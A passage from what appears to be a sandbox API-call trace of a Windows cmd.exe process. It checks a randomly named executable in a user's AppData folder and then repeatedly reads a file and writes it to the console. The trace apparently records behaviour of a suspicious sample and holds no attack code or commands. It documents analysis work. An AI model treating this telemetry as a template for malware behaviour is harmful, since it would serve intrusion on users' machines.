GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2af1e4 | out: lpConsoleScreenBufferInfo=0x2af1e4) returned 1 [0194.771] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0194.773] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0194.773] GetConsoleTitleW (in: lpConsoleTitle=0x2af6d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.773] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0194.773] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.774] GetFileType (hFile=0x50) returned 0x1 [0194.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.774] GetFileType (hFile=0x50) returned 0x1 [0194.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.774] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] GetFileType (hFile=0x50) returned 0x1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] GetFileType (hFile=0x50) returned 0x1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] GetFileType (hFile=0x50) returned 0x1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] GetFileType (hFile=0x50) returned 0x1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] GetFileType (hFile=0x50) returned 0x1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] GetFileType (hFile=0x50) returned 0x1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.777] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.777] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] GetFileType (hFile=0x50) returned 0x1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] GetFileType (hFile=0x50) returned 0x1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] GetFileType (hFile=0x50) returned 0x1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] GetFileType (hFile=0x50) returned 0x1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] GetFileType (hFile=0x50) returned 0x1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] GetFileType (hFile=0x50) returned 0x1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] GetFileType (hFile=0x50) returned 0x1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] GetFileType (hFile=0x50) returned 0x1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.778] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.779] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] GetFileType (hFile=0x50) returned 0x1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] GetFileType (hFile=0x50) returned 0x1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] GetFileType (hFile=0x50) returned 0x1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] GetFileType (hFile=0x50) returned 0x1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] GetFileType (hFile=0x50) returned 0x1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.780] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.780] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.782] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.782] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] GetFileType (hFile=0x50) returned 0x1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] GetFileType (hFile=0x50) returned 0x1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] GetFileType (hFile=0x50) returned 0x1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] GetFileType (hFile=0x50) returned 0x1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] GetFileType (hFile=0x50) returned 0x1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.783] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.783] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] GetFileType (hFile=0x50) returned 0x1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] GetFileType (hFile=0x50) returned 0x1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] GetFileType (hFile=0x50) returned 0x1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.787] GetFileType (hFile=0x50) returned 0x1 [0194.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.787] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.787] GetFileType (hFile=0x50) returned 0x1 [0194.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.787] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.787] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.787] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.787] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.787] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.787] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] GetFileType (hFile=0x50) returned 0x1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.788] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] GetFileType (hFile=0x50) returned 0x1 [0194.789] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.789] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.789] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.789] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.789] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, 